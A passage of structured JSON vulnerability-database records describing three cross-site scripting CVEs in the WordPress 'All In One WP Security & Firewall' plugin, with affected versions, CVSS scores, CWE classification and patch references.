          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "4.0.5"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "4.0.5"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          }
        ]
      },
      "cve": "CVE-2016-10868",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2016-10868",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-89687",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2016-10868",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2016-10868",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2016-10868",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-850",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-89687",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 4.0.5 for WordPress has XSS in the blacklist, file system, and file change detection settings pages. WordPress for all-in-one-wp-security-and-firewall The plug-in contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2016-10868"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "VULHUB",
            "id": "VHN-89687"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2016-10868",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-89687",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "id": "VAR-201908-1125",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89687"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T22:29:58.271000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Fixes for plugin cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96540"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10868"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10868"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-89687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89687"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "date": "2019-08-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          },
          {
            "date": "2019-08-13T17:15:12.233000",
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-16T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89687"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          },
          {
            "date": "2024-11-21T02:44:56.800000",
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  all-in-one-wp-security-and-firewall Plug-in vulnerable to cross-site scripting",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201908-1202

    Vulnerability from variot - Updated: 2024-11-23 21:59

    The all-in-one-wp-security-and-firewall plugin before 3.9.8 for WordPress has XSS in the unlock request feature. The all-in-one-wp-security-and-firewall plugin for WordPress contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client-supplied data in the web application. An attacker could exploit this vulnerability to execute client-side code.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1202",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "3.9.8"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "3.9.8"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          }
        ]
      },
      "cve": "CVE-2015-9293",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2015-9293",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-87254",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2015-9293",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-9293",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2015-9293",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-839",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-87254",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 3.9.8 for WordPress has XSS in the unlock request feature. WordPress for all-in-one-wp-security-and-firewall The plug-in contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-9293"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "VULHUB",
            "id": "VHN-87254"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2015-9293",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-87254",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "id": "VAR-201908-1202",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87254"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T21:59:43.371000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Fixes for plugin cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96530"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-9293"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-9293"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-87254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-87254"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "date": "2019-08-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          },
          {
            "date": "2019-08-13T17:15:11.627000",
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-16T00:00:00",
            "db": "VULHUB",
            "id": "VHN-87254"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          },
          {
            "date": "2024-11-21T02:40:16.363000",
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  all-in-one-wp-security-and-firewall Plug-in vulnerable to cross-site scripting",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201908-1123

    Vulnerability from variot - Updated: 2024-11-23 21:52

    The all-in-one-wp-security-and-firewall plugin before 4.2.0 for WordPress has multiple XSS issues. The all-in-one-wp-security-and-firewall plug-in for WordPress contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client-supplied data in web applications. An attacker could exploit this vulnerability to execute code on the client.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1123",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "4.2.0"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "4.2.0"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          }
        ]
      },
      "cve": "CVE-2016-10866",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
